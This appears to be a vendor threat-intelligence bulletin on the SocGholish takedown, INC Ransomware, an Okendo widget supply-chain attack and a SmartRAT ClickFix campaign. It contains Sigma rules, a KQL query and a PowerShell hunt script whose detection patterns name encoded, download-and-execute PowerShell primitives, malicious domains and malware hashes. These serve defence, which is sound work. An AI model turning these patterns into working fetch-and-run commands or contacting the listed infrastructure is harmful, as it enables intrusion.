SocGholish Takedown, INC Ransomware Evolution & Supply Chain Injection: OTX Pulse Intelligence

Recent OTX pulses indicate a significant shift in the threat landscape, characterized by the disruption of a major malware loader operation and the rapid evolution of emerging ransomware and supply chain threats.

Operation Endgame: A multinational law enforcement effort has successfully dismantled the infrastructure supporting SocGholish, a pervasive malware framework utilized by TA569 (GOLD PRELUDE) since 2017. This operation resulted in the seizure of 106 servers and the remediation of approximately 15,000 compromised WordPress sites that were being used as initial access vectors, primarily via fake browser update prompts.
Rising RaaS: With the disruption of major cartels like LockBit, INC Ransomware has aggressively expanded, rebranding and rewriting its encryptors in Rust to target both Windows and Linux/ESXi platforms. Their affiliate model now heavily leverages vulnerabilities like CVE-2025-5777 and CVE-2024-57727 for initial access.
Supply Chain & AI-Driven Attacks: A new wave of sophisticated attacks is exploiting trusted third-party components and AI-generated content. Threat actors have compromised the Okendo Reviews widget, injecting malicious JavaScript into over 18,000 e-commerce sites to deliver RATs like NetSupport and Sectop RAT. Separately, an AI-generated ClickFix campaign is targeting the Brazilian financial sector, using typosquatted domains and fake CAPTCHAs to distribute SmartRAT.
Infostealer Proliferation: Infostealers such as ACRStealer, LummaC2, and AgentTesla continue to see widespread distribution, primarily through cracked software hosting on platforms like Mediafire and AWS S3 buckets.

Threat Actor / Malware Profile

GOLD PRELUDE (TA569): The primary actor behind the now-disrupted SocGholish framework. Their primary method involved compromising WordPress sites to deliver fake browser update prompts, leading to the download of malicious JScript payloads. This loader was a primary distributor for major malware families including IcedID, Pikabot, and QakBot. While infrastructure is seized, affiliates may pivot to other loaders.
INC Ransomware: A top-tier Ransomware-as-a-Service (RaaS) operation that has evolved significantly. Its new Rust-based encryptors allow for cross-platform attacks. The group employs a double-extortion model and is actively exploiting vulnerabilities, such as the CVE-2025-5777 series, to gain initial access. Their post-exploitation toolkit includes Cobalt Strike and custom tools like Lynx and Sinobi.
SmartApeSG: The threat actor behind the Okendo Reviews supply chain attack. By injecting malicious code into a legitimate JavaScript widget, they can stage and deliver payloads, including NetSupport, Remcos, and SmartRAT, directly to victims' browsers without any further user interaction on the e-commerce site.
SmartRAT: A PowerShell-based banking trojan and RAT delivered in the AI-driven ClickFix campaign. It features encrypted C2 communication, QR code interception, and data stealing capabilities. Its delivery relies on social engineering (fake CAPTCHA/BSOD) to trick users into executing PowerShell commands.

IOC Analysis

The provided IOCs are varied and require a multi-layered defensive approach:

Domains & Hostnames: A large number of hostnames (e.g., trademark.iglesiaelarca.com) and domains (e.g., crefisa.online, incblog.su) are associated with C2 infrastructure, payload staging, and typosquatting. These should be blocked at the DNS and network perimeter.
File Hashes: Multiple MD5, SHA1, and SHA256 hashes are provided for payloads, including ransomware samples and droppers. These are critical for EDR and AV solutions to block file execution and scan for artifacts on disk.
URLs: Specific URLs point to malicious infrastructure for the Okendo compromise (api.wiggett...com) and the malicious JavaScript file itself (cdn-static.okendo.io...). Blocking these URLs is essential to prevent the initial payload fetch.
CVEs: While not direct IOCs, the listed CVEs (e.g., CVE-2025-5777) should be prioritized for patching as they are identified initial access vectors for INC Ransomware.

SOC teams should immediately ingest these IOCs into their SIEM and EDR platforms. The domains and URLs should be blocked via network proxy and DNS sinkholing. File hashes can be used for YARA rule creation and retrospective hunting for potential breaches.

Detection Engineering

Sigma Rules

YAML

---
title: Potential SocGholish Fake Browser Update
description: Detects potential execution of malicious JScript files delivered via fake browser update prompts, often associated with SocGholish and TA569.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.infoblox.com/blog/threat-intelligence/hot-take-operation-endgame-vs-socgholish/
tags:
  - attack.execution
  - attack.t1059.005
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\wscript.exe'
      - '\cscript.exe'
  selection_cli:
    CommandLine|contains:
      - 'update'
      - 'chrome'
      - 'firefox'
      - 'edge'
  selection_ext:
    CommandLine|contains:
      - '.js'
      - '.jse'
  condition: all of selection_*
falsepositives:
  - Legitimate system administration scripts
level: high
---
title: Suspicious PowerShell Execution Associated with ClickFix/SmartRAT
description: Detects PowerShell commands often used in ClickFix campaigns, including encoded commands and those mimicking system errors or updates.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat
tags:
  - attack.execution
  - attack.t1059.001
  - attack.initial_access
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
  selection_cli:
    CommandLine|contains:
      - 'FromBase64String'
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
  selection_keywords:
    CommandLine|contains:
      - 'captcha'
      - 'bsod'
      - 'update'
  condition: all of selection_*
falsepositives:
  - Legitimate administrative scripts
level: high
---
title: Potential Supply Chain Compromise via Okendo Widget
description: Detects network connections to suspicious domains associated with the Okendo Reviews supply chain attack.
author: Security Arsenal
date: 2026/06/20
references:
  - https://www.zscaler.com/blogs/security-research/smartapesg-launches-okendo-reviews-supply-chain-attack
tags:
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationHostname|contains:
      - 'wiggett'
      - 'wizzleticks'
  condition: selection
falsepositives:
  - None
level: critical

KQL Hunt Query (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender

// Hunt for potential C2 communication and malicious downloads associated with provided IOCs
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has_any (
    "iglesiaelarca.com", "garretttrails.org", "summat10n.org", 
    "roofnrack.us", "asurans.com", "beautysupplysalonllc.com",
    "okendo.io", "wiggett", "wizzleticks",
    "crefisa.online", "windowsupdate-cdn.com",
    "incblog.su", "comples.biz", "dafkov.shop"
)
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, ActionType

union (
    DeviceProcessEvents
    | where Timestamp > ago(7d)
    | where SHA256 in (
        "46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c",
        "6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141"
    )
    or MD5 in (
        "297eb45f028d44d750297d2f932b9c91", "3c72e1f37f115b00c3ad6ed31bacfe8a",
        "6bf4d4c62b5138ace281ce3d08297787", "b17ccdb5531555e43f082d6e77c07227",
        "0d1f6685b4e284f92ef25c0f935b8cdc"
    )
    | project Timestamp, DeviceName, AccountName, ProcessCommandLine,FolderPath, SHA256, MD5
)

PowerShell Hunt Script

PowerShell

<#
.SYNOPSIS
    Hunt script for IOCs related to SocGholish, INC Ransomware, and SmartRAT.
.DESCRIPTION
    This script checks the local system for the presence of suspicious files, processes, and registry keys.
.NOTES
    Author: Security Arsenal
    Date: 2026-06-20
#>

# Define File Hashes to search for
$SuspiciousSHA256 = @(
    "46e32500cd24395dd140293758e72fe8671217f5f5b0307858fc118a125aab8c",
    "6cd349eda0fa6c8b274a0920852c68f8b727afea1fdbc69ad183cef05d9cf141"
)
$SuspiciousMD5 = @(
    "297eb45f028d44d750297d2f932b9c91", "3c72e1f37f115b00c3ad6ed31bacfe8a",
    "6bf4d4c62b5138ace281ce3d08297787", "b17ccdb5531555e43f082d6e77c07227",
    "0d1f6685b4e284f92ef25c0f935b8cdc"
)

# Scan for files matching the hashes
Write-Host "Scanning for suspicious files..."
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | Where-Object { 
    $_.Length -gt 0 -and (
        (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash -in $SuspiciousSHA256 -or 
        (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash -in $SuspiciousMD5
    ) 
} | Select-Object FullName, LastWriteTime | Format-Table -AutoSize

# Scan for suspicious process command lines
Write-Host "Checking for suspicious processes..."
Get-WmiObject Win32_Process | Where-Object { 
    $_.CommandLine -match "FromBase64String" -or 
    $_.CommandLine -match "IEX " -or 
    $_.CommandLine -match "wiggett" -or 
    $_.CommandLine -match "wizzleticks"
} | Select-Object Name, ProcessId, CommandLine | Format-Table -AutoSize

# Check for suspicious persistence mechanisms (Registry)
Write-Host "Checking for suspicious registry entries..."
$Paths = @(
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
)

foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        Get-Item -Path $Path | Select-Object -ExpandProperty Property | ForEach-Object {
            $PropValue = (Get-ItemProperty -Path $Path -Name $_).$_
            if ($PropValue -match ".js" -or $PropValue -match ".jse" -or $PropValue -match "powershell.*IEX") {
                Write-Host "Suspicious registry entry found in $Path:"
                Write-Host "Name: $_ - Value: $PropValue"
            }
        }
    }
}
Write-Host "Hunt script execution complete."

Response Priorities

Immediate:
- Block all domains and URLs listed in the IOC Analysis section at your network perimeter, proxy, and DNS servers.
- Scan your entire environment for the provided file hashes.
- For e-commerce businesses, urgently inspect any Okendo Reviews widgets and apply vendor patches or mitigations immediately.
24 Hours:
- Hunt for and investigate any instances of PowerShell execution matching the ClickFix patterns on workstations, especially in finance departments or with ties to Brazil.
- Initiate credential resets and identity verification for any accounts on systems flagged with potential infostealer activity.
1 Week:
- Patch all systems against the CVEs listed in the Threat Summary (e.g., CVE-2025-5777, CVE-2024-57727, CVE-2023-3519).
- Conduct a review of supply chain security, focusing on the integrity of third-party web scripts and widgets.
- Enhance endpoint detection rules to catch behaviors associated with fake browser updates and suspicious PowerShell activity.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub